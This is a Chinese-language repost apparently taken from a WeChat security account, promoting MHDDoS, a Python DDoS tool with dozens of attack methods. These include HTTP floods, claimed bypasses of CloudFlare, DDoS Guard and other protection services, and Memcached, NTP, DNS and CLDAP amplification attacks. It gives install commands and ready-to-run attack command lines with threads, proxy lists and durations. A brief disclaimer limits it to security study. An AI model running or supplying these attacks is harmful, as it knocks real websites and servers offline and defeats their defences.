关于MHDDoS
工具技术
Layer7
GET | GET 泛洪 POST | POST 泛洪 OVH | 绕过OVH RHEX | 随机HEX STOMP | 绕过chk_captcha STRESS | 使用高位字节发送HTTP包 DYN | 一种随机子域名的新方法 DOWNLOADER | 缓慢读取数据的新方法 SLOW | 一种DDoS的技术 HEAD|https://developer.mozilla.org/en- US/docs/Web/HTTP/Methods/HEAD NULL | 空UserAgent COOKIE | 随机Cookie PHP 'if (isset($_COOKIE))' PPS | 仅'GET / HTTP/1.1rnrn' EVEN | 包含更多Header的GET方法 GSB | Google Project Shield 绕过 DGB | DDoS Guard 绕过 AVB | Arvan Cloud 绕过 BOT | Like Google bot APACHE | Apache漏洞利用 XMLRPC | WP XMLRPC 漏洞利用(add /xmlrpc.php) CFB | CloudFlare 绕过 CFBUAM | CloudFlare Under Attack Mode 绕过 绕过 | 绕过 Normal AntiDDoS BOMB | 绕过 with codesenberg/bombardier KILLER | 执行多线程DDoS攻击 TOR | 绕过 onion website
Layer4
TCP | TCP 泛洪绕过 UDP | UDP 泛洪绕过 SYN | SYN 泛洪 CPS | 开启或关闭连接代理 ICMP | Icmp请求泛洪 (Layer3) CONNECTION | 使用代理打开活动连接 VSE | 发送VSE协议 TS3 | 发送Teamspeak 3 Status Ping 协议 FIVEM | 发送Fivem Status Ping 协议 MEM | Memcached 放大攻击 NTP | NTP 放大攻击 MCBOT | Minecraft Bot 攻击 MINECRAFT | Minecraft Status Ping 协议 MCPE | Minecraft PE Status Ping 协议 DNS | DNS 放大攻击 CHAR | Chargen 放大攻击 CLDAP | Cldap 放大攻击 ARD | Apple Remote Desktop 放大攻击 RDP | Remote Desktop Protocol 放大攻击
工具
CFIP | 寻找基于Cloudflare的网站真实IP地址 DNS | 显示站点的DNS记录 TSSRV | TeamSpeak SRV解析器 PING | PING服务器 CHECK | 检测目标站点状态 DSTAT | 显示收到的字节数据
其他
STOP | 终止所有攻击测试 TOOLS | 终端工具 HELP | 显示工具帮助信息
工具要求
dnspython cfscrape impacket requests Python3 PyRoxy icmplib certifi psutil yarl
工具安装
源码安装
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
(向右滑动、查看更多)
One-Line安装
apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt
(向右滑动、查看更多)
工具使用样例
Layer7(网站)
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
(向右滑动、查看更多)
Layer4(服务器)
python start.py udp 1.1.1.1:53 1 3600
python start.py dns 1.1.1.1:53 100 3600 dns.txt
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
(向右滑动、查看更多)
调试模式(记录攻击状态)
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
(向右滑动、查看更多)
工具/帮助
python start.py tools
python start.py help
工具运行截图
工具视频
使用演示:https://www.aparat.com/v/bHcP9 工具教程:https://www.aparat.com/v/XPn5Z
许可证协议
本项目的开发与发布遵循MIT开源许可证协议。
项目地址
MHDDoS:https://github.com/MatrixTM/MHDDoS 文章来源:freebuf
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看
多一条小鱼干
原文始发于微信公众号(黑白之道):MHDDoS:一个包含了56种技术的DDoS测试工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论